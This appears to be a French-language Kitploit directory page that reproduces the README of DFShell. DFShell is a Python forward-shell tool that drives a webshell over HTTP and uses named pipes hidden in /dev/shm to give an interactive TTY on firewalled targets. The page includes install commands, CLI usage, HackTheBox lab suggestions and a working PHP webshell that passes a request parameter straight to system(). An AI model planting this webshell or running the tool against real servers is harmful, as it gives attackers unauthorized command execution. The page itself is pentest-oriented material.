Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
DFShell — Outil de shell direct basé sur Python qui crée un shell interactif de type TTY via HTTP en utilisant des pipes nommés, permettant l'exécution de commandes sur des cibles protégées par un pare-feu sans connexions réseau persistantes. | Kitploit
Outils/GitHubGitHub/d3ext/dfshell
Génération de PayloadsShellcodeExploitation d'Applications WebTests d'Intrusion
GitHubd3ext/dfshell

DFShell

Outil de shell direct basé sur Python qui crée un shell interactif de type TTY via HTTP en utilisant des pipes nommés, permettant l'exécution de commandes sur des cibles protégées par un pare-feu sans connexions réseau persistantes.

Voir le dépôt
12219il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
root@kitploit:~
██████╗ ███████╗███████╗██╗  ██╗███████╗██╗     ██╗     
██╔══██╗██╔════╝██╔════╝██║  ██║██╔════╝██║     ██║     
██║  ██║█████╗  ███████╗███████║█████╗  ██║     ██║     
██║  ██║██╔══╝  ╚════██║██╔══██║██╔══╝  ██║     ██║     
██████╔╝██║     ███████║██║  ██║███████╗███████╗███████╗
╚═════╝ ╚═╝     ╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝                      

Introduction

D3Ext's Forward Shell est un script python3 qui utilise mkfifo pour simuler un shell sur la machine victime. Il crée un répertoire caché dans /dev/shm/.fs/ où les fifos sont stockés. Vous pouvez même simuler un TTY via le webshell.

Explication

Ce forward shell crée un shell qui accepte les commandes via un Named Pipe (mkfifo) et affiche les résultats dans un fichier. Ainsi, le shell ne nécessite pas de connexion réseau persistante, vous pouvez donc établir un TTY approprié derrière un pare-feu qui bloque les shells inverses/liés.

  1. Créer un tube nommé sur le serveur cible
  2. Lire et exécuter les commandes reçues du tube nommé
  3. Enregistrer STDOUT et STDERR dans un fichier de sortie
  4. Revenir à l'étape 2 et lire à nouveau le tube nommé

Fonctionnalités

  • Rapide et configurable
  • Commandes puissantes intégrées
  • Shell TTY interactif

Installation

Installer depuis les sources

root@kitploit:~
git clone https://github.com/D3Ext/DFShell
cd DFShell
pip3 install -r requirements.txt

Installer avec pip

root@kitploit:~
pip3 install dfshell

Utilisation

DFShell dispose de divers paramètres CLI pour améliorer la configuration du forward shell.

Panneau d'aide

root@kitploit:~
usage: dfshell.py [-h] -u URL -p PARAMETER [-t TIMEOUT] [--path PATH] [-v VERBOSE]

D3Ext's Forward Shell - Enhanced forward shell with integrated commands

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     url of the webshell (i.e. http://10.10.10.10/webshell.php)
  -p PARAMETER, --parameter PARAMETER
                        parameter of the webshell to execute commands (i.e. cmd)
  -t TIMEOUT, --timeout TIMEOUT
                        timeout of requests that execute commands (default 20s)
  --path PATH           path in which to create named pipes (default /dev/shm/.fs)
  -v VERBOSE, --verbose VERBOSE
                        print more information

Il envoie des requêtes GET à l'URL donnée, donc le webshell devrait ressembler à ceci :

root@kitploit:~
<?php
  if(isset($_REQUEST['cmd']))
  {
    system($_REQUEST['cmd']);
  }
?>

Testé sur Parrot OS avec un serveur Apache

Si vous voulez tester cet outil dans des environnements contrôlés, voici une liste de machines HackTheBox sur lesquelles des règles de pare-feu sont appliquées sur le serveur web, donc forward shell est une excellente alternative pour passer directement à l'escalade de privilèges.

  • Inception




Démo

Références

Merci à @ippsec pour cette technique géniale

root@kitploit:~
https://github.com/IppSec/forward-shell
https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux#forward-shell
https://www.f5.com/labs/learning-center/forward-and-reverse-shells
https://github.com/Hypnoze57/FShell
https://s4vitar.github.io/ttyoverhttp/

Contribuer

Voir CONTRIBUTING.md

Journal des modifications

Voir CHANGELOG.md

Licence

Ce projet est sous licence MIT

Copyright © 2023, D3Ext

Soutien

Buy Me A Coffee

Télécharger l’outil